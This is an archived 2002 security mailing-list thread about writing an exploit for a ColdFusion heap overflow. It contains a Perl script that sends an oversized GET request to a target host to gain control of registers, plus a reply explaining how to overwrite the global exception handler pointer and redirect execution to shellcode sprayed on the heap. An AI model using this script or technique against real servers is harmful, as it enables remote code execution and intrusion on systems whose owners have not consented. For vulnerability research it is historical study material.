Re: ColdFusion Heap Overflow

[Dave Aitel <dave () immunitysec com>]

Overwriting the exception pointers on the stack is crazy talk. The stack
moves all around, and you'd never get the right one. However, there is a
global exception pointer as well, which is used if it is set. Check out
DDK-IIS.c and see the values they have for that, and try overwriting it.
It actually works better if you do it without debugging the program, in
my experience.

Most people exploit heap overflows by overwriting that global exception
handler pointer thingy (yes, this is what it is technically called) and
then pointing the program's eip into the heap, where they've stuffed
half a gig of nops and some crappy SP dependant win32 shellcode.

-dave



On Thu, 14 Nov 2002 11:31:10 -0000
"Gary O'leary-Steele" <garyo () sec-1 com> wrote:

> Hi all,
>
>
> I need some help with a subject I have trying to get my head round for
> some time. I am attempting to write exploit code for the recent
> coldfusion heap overflow discovered by eeye. I don't fully understand
> heap overflows but here is where I'm at.
>
> I can control the following values within the following instruction,
>
> mov    [ecx] ,  eax
>
>
> where ecx and eax can be any value I specify. Thinking back to the
> .asp chunked transfer overflow, many people talked about and
> implemented exploits which overwrite the structured exception handler
> to gain EIP. Due to the fact my area is stack overflows I started by
> trying to overwrite the saved RET by specifying its location in [ecx]
> and the required value in eax. However this just caused the program to
> crash in a different place and the value in EBP was no where near
> where it was in the mov [ecx],eax instruction.
>
> I am looking for the following;
>
> How is the exception handler overwritten ? is it in a static place
> etc??
>
> Papers or advice on exploiting this type of vulnerability.
>
> or any ideas using what I already have.
>
> The following is the code I am currently using to overwrite the values
> in ecx and eax (ecx = 0x42424242 eax=0x41414141)
>
>
>
> #Coldfusion HEAP overflow
>
> if (@ARGV<1) {die "\nCold Fusion Heap Overflow. \n Usage \=
> IP/host:Port e.g. Perl $0 www.target.com\n";}
> use Socket;
>  ($host,$port)=split(/:/,@ARGV[0]);$target = inet_aton($host);
>  unless($port){$port = 80;}
>
> ###################
> $len1 = "A" x 1000;
>
> $len2 = "B" x 1000;
>
> $len3 = "C" x 1000;
>
> $len4 = "D" x 1000;
> ###################
>
>
>  $len5 = "E" x 119;
>
>
>  $len5 = $len5 ."BBBB"."AAAA". "e" x 175 ."n" x 175;
>
>
>  $len6 = "X" x 500;
>
>
>  $len = $len1 .$len2 .$len3.$len4.$len5.$len6;
>
>  $getreq = 'GET /' . $len . '.cfm' .' HTTP/1.0';
>
>
> $padrequest =
> $getreq.
> "\r\n".
> 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/vnd.ms-powerpoint, application/vnd.ms-excel,
> application/msword,*/*'.
> "\r\n".
> 'Accept-Language: en-gb'.
> "\r\n".
> 'Accept-Encoding: gzip, deflate'.
> "\r\n".
> 'User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;
> Q312461;.NET CLR 1.1.4322)'.
> "\r\n".
> 'Host: '. $host.
> "\r\n".
> 'Connection: Keep-Alive'.
> "\r\n\r\n";
>
>
>
>
> @result =sendraw($padrequest);
> print $padrequest;
> print length($padrequest);
> #print @result;
>
> sub sendraw {   # this saves the whole transaction anyway
>  my ($pstr)=@_;
>  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
>   die("Socket problems\n");
>  if(connect(S,pack "SnA4x8",2,$port,$target)){
>   my @in;
>   select(S);      $|=1;   print $pstr;
>   while(<S>){ push @in, $_;}
>   select(STDOUT); close(S); return @in;
>  } else { die("Can't connect...\n"); }
> }
>
>
> Thanks in advance.
>
> Kind Regards
> Gary
> Sec-1